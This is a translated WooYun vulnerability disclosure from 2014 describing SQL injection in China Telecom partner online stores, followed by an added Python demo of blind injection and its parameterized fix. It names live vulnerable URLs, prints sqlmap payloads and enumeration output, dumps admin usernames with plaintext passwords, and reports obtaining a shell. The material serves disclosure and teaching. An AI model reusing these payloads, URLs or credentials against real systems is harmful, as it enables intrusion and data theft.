
Vulnerability summary

Defect ID: wooyun-2014-078544

Title: SQL injection in a China Telecom online store gives direct root access

Related vendor: 中国电信 (China Telecom)

Author: 老和尚

Submitted: 2014-10-10 14:37

Fixed: 2014-11-24 14:38

Published: 2014-11-24 14:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-10-10: Details sent to the vendor, awaiting vendor handling
2014-10-14: Vendor confirmed; details disclosed to the vendor only
2014-10-24: Details disclosed to core white hats and domain experts
2014-11-03: Details disclosed to regular white hats
2014-11-13: Details disclosed to intern white hats
2014-11-24: Details disclosed to the public

Brief description:

Old Monk: Patron Telecom, you dropped something
Telecom: Dropped what?
Old Monk: A big pile of holes
Telecom: Damn. Help me pick them up
Old Monk: A monk is merciful, so it's not expensive. 998
Telecom: Screw you, see you on WooYun.....

Detailed description:

Vulnerable page: http://www.yiliangoo.com/search.php?g=0&b=0&c=&s=0&k=%27
The vulnerabilities in the Beijing ego10000 store have already been published and still have not been fixed, so I list them here too.
http://www.ego10000.com/search.php?b=687&c=1'%22&g=703
http://www.ego10000.com/ajax_check_user.php?email=
Plus a path disclosure: http://ego10000.com/includes/footer.php
The injectable parameter is: c
1. After dumping data directly through the injection, I then used:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: email
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: email=1%' RLIKE (SELECT (CASE WHEN (4400=4400) THEN 1 ELSE 0x28 END)) AND '%'='
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: email=1%' AND (SELECT 2861 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (CASE WHEN (2861=2861) THEN 1 ELSE 0 END)),0x716c617271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: email=1%' AND 1288=BENCHMARK(5000000,MD5(0x4b6e6c79)) AND '%'='
---
[10:41:29] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0
[10:41:29] [INFO] fetching database names
[10:41:29] [WARNING] reflective value(s) found and filtering out
[10:41:29] [INFO] the SQL query used returns 11 entries
[10:41:29] [INFO] retrieved: information_schema
[10:41:29] [INFO] retrieved: dspam
[10:41:29] [INFO] retrieved: ego10000
[10:41:30] [INFO] retrieved: ego10000_bak
[10:41:30] [INFO] retrieved: extmail
[10:41:30] [INFO] retrieved: hallylure
[10:41:30] [INFO] retrieved: mysql
[10:41:30] [INFO] retrieved: shopstit
[10:41:30] [INFO] retrieved: stit_v3
[10:41:30] [INFO] retrieved: test
[10:41:30] [INFO] retrieved: ybzdb
available databases [11]:
[*] dspam
[*] ego10000
[*] ego10000_bak
[*] extmail
[*] hallylure
[*] information_schema
[*] mysql
[*] shopstit
[*] stit_v3
[*] test
[*] ybzdb
[10:41:30] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\www.yiliangoo.com'
[*] shutting down at 10:41:30
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: email
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: email=1%' RLIKE (SELECT (CASE WHEN (4400=4400) THEN 1 ELSE 0x28 END)) AND '%'='
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: email=1%' AND (SELECT 2861 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (CASE WHEN (2861=2861) THEN 1 ELSE 0 END)),0x716c617271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: email=1%' AND 1288=BENCHMARK(5000000,MD5(0x4b6e6c79)) AND '%'='
---
[10:53:22] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0
[10:53:22] [INFO] fetching tables for database: 'stit_v3'
[10:53:22] [WARNING] reflective value(s) found and filtering out
[10:53:22] [INFO] the SQL query used returns 45 entries
[10:53:23] [INFO] retrieved: act_award_info
[10:53:23] [INFO] retrieved: act_user_award_info
[10:53:23] [INFO] retrieved: activityinfo
[10:53:23] [INFO] retrieved: ad_info
[10:53:23] [INFO] retrieved: admingroup
[10:53:23] [INFO] retrieved: adminmenu
[10:53:23] [INFO] retrieved: adminuser
[10:53:23] [INFO] retrieved: ask_goods_info
[10:53:24] [INFO] retrieved: attribute_class_info
[10:53:24] [INFO] retrieved: attribute_class_select_value_info
[10:53:24] [INFO] retrieved: attribute_value_info
[10:53:27] [INFO] retrieved: class_info
[10:53:27] [INFO] retrieved: create_html
[10:53:27] [INFO] retrieved: dispatch_mode_info
[10:53:27] [INFO] retrieved: dispatch_pay_mutuality_info
[10:53:30] [INFO] retrieved: gift_info
[10:53:30] [INFO] retrieved: gift_order
[10:53:30] [INFO] retrieved: goods_fav
[10:53:30] [INFO] retrieved: goods_fitting_mutuality_info
[10:53:30] [INFO] retrieved: goods_image_info
[10:53:30] [INFO] retrieved: goods_info
[10:53:30] [INFO] retrieved: goods_more_info
[10:53:31] [INFO] retrieved: goods_mutuality_info
[10:53:31] [INFO] retrieved: goods_taocan
[10:53:31] [INFO] retrieved: goods_taocan_attr
[10:53:32] [INFO] retrieved: goods_taocan_value
[10:53:32] [INFO] retrieved: gp_class
[10:53:32] [INFO] retrieved: news
[10:53:32] [INFO] retrieved: notice
[10:53:32] [INFO] retrieved: order_detail_info
[10:53:33] [INFO] retrieved: order_info
[10:53:33] [INFO] retrieved: order_network
[10:53:33] [INFO] retrieved: rcmdgoods
[10:53:33] [INFO] retrieved: repair
[10:53:33] [INFO] retrieved: search_log
[10:53:36] [INFO] retrieved: shop_basket
[10:53:39] [INFO] retrieved: sms
[10:53:39] [INFO] retrieved: tel_number
[10:53:39] [INFO] retrieved: tel_taocan_value
[10:53:40] [INFO] retrieved: tel_type
[10:53:40] [INFO] retrieved: tel_type_template
[10:53:40] [INFO] retrieved: tel_type_template_attr
[10:53:40] [INFO] retrieved: telnumber
[10:53:40] [INFO] retrieved: usercent
[10:53:40] [INFO] retrieved: userinfo
Database: stit_v3
[45 tables]
+-----------------------------------+
| act_award_info |
| act_user_award_info |
| activityinfo |
| ad_info |
| admingroup |
| adminmenu |
| adminuser |
| ask_goods_info |
| attribute_class_info |
| attribute_class_select_value_info |
| attribute_value_info |
| class_info |
| create_html |
| dispatch_mode_info |
| dispatch_pay_mutuality_info |
| gift_info |
| gift_order |
| goods_fav |
| goods_fitting_mutuality_info |
| goods_image_info |
| goods_info |
| goods_more_info |
| goods_mutuality_info |
| goods_taocan |
| goods_taocan_attr |
| goods_taocan_value |
| gp_class |
| news |
| notice |
| order_detail_info |
| order_info |
| order_network |
| rcmdgoods |
| repair |
| search_log |
| shop_basket |
| sms |
| tel_number |
| tel_taocan_value |
| tel_type |
| tel_type_template |
| tel_type_template_attr |
| telnumber |
| usercent |
| userinfo |
+-----------------------------------+
[10:53:40] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\www.yiliangoo.com'
[*] shutting down at 10:53:40


Table: adminuser
[5 entries]
+----------+--------------+
| username | userpassword |
+----------+--------------+
| jon | 111 |
| wlj | 111 |
| ?? | 123 |
| ??? | 123 |
| ??? | 123 |
+----------+--------------+


Proof of vulnerability:

Shell obtained (GETSHELL)

[Screenshot: QQ图片20140407140909.jpg]


[Screenshot: QQ图片20140407140957.jpg]


Fix recommendation:

Filter the parameters, use more complex passwords, and pay more attention to security.

Copyright notice: please credit 老和尚@乌云 when reposting
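The following is an added example, not code from the original report or from the shop's codebase. It reproduces, on an in-memory SQLite table, the boolean-based blind injection that sqlmap reported against the `email` parameter (the `1%' ... AND '%'='` prefix/suffix in the payloads above implies the value is concatenated into a `LIKE '%...%'` pattern), shows the character-by-character bisection behind every "retrieved:" line in the log, and puts the parameterized query beside it. The table names, sample rows and the `check_user_*` function names are assumptions constructed for the demo; only the boolean-based variant is reproduced, since RLIKE, the FLOOR(RAND(0)*2) error trick and BENCHMARK are MySQL-specific.

```python
"""Added example (not from the original report): boolean-based blind SQL
injection through a concatenated LIKE pattern, and the parameterized fix.
All names and data below are constructed for the demo."""
import sqlite3

# Constructed sample data; the real adminuser dump is in the report above.
ADMINS = [("jon", "111"), ("wlj", "111")]
USERS = [("user1@example.com",), ("user2@example.com",)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE adminuser (username TEXT, userpassword TEXT)")
    conn.executemany("INSERT INTO adminuser VALUES (?, ?)", ADMINS)
    conn.execute("CREATE TABLE userinfo (email TEXT)")
    conn.executemany("INSERT INTO userinfo VALUES (?)", USERS)
    return conn


def check_user_vulnerable(conn, email):
    """Shape implied by sqlmap's payloads: the raw value is concatenated
    straight into a LIKE '%...%' pattern (assumed, not the shop's code)."""
    sql = "SELECT COUNT(*) FROM userinfo WHERE email LIKE '%" + email + "%'"
    return conn.execute(sql).fetchone()[0] > 0


def check_user_fixed(conn, email):
    """Same lookup with a bound parameter: the value can only ever be data."""
    sql = "SELECT COUNT(*) FROM userinfo WHERE email LIKE ?"
    return conn.execute(sql, ("%" + email + "%",)).fetchone()[0] > 0


def oracle(conn, condition):
    """The attacker's view: inject a condition, read the yes/no answer.
    '1' is the original value, as in the logged payloads, so the LIKE still
    matches a row whenever the injected condition is true."""
    payload = "1%' AND (" + condition + ") AND '%'='"
    return check_user_vulnerable(conn, payload)


def extract_blind(conn, expr, max_len=32):
    """Recover the string returned by subquery `expr` one character at a
    time, bisecting each code point with the yes/no oracle (about 7 requests
    per character); this is what sqlmap does behind each 'retrieved:' line."""
    out = ""
    for i in range(1, max_len + 1):
        if not oracle(conn, f"length(({expr})) >= {i}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({expr}),{i},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    conn = make_db()
    target = "SELECT userpassword FROM adminuser WHERE username='jon'"
    return {
        "blind_true": oracle(conn, "1=1"),
        "blind_false": oracle(conn, "1=2"),
        "extracted": extract_blind(conn, target),
        "fixed_same_payload": check_user_fixed(conn, "1%' AND (1=1) AND '%'='"),
        "fixed_legit": check_user_fixed(conn, "user1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the two halves of the recommendation above: the oracle answers differently for a true and a false condition, so the admin password comes out character by character without any visible error, while the same payload against `check_user_fixed` is just a literal pattern that matches nothing. Binding the parameter is the fix; the `%` wildcards stay in the application's own string, not in the user's.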


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2014-10-14 17:38

Vendor reply:

Latest status:

None yet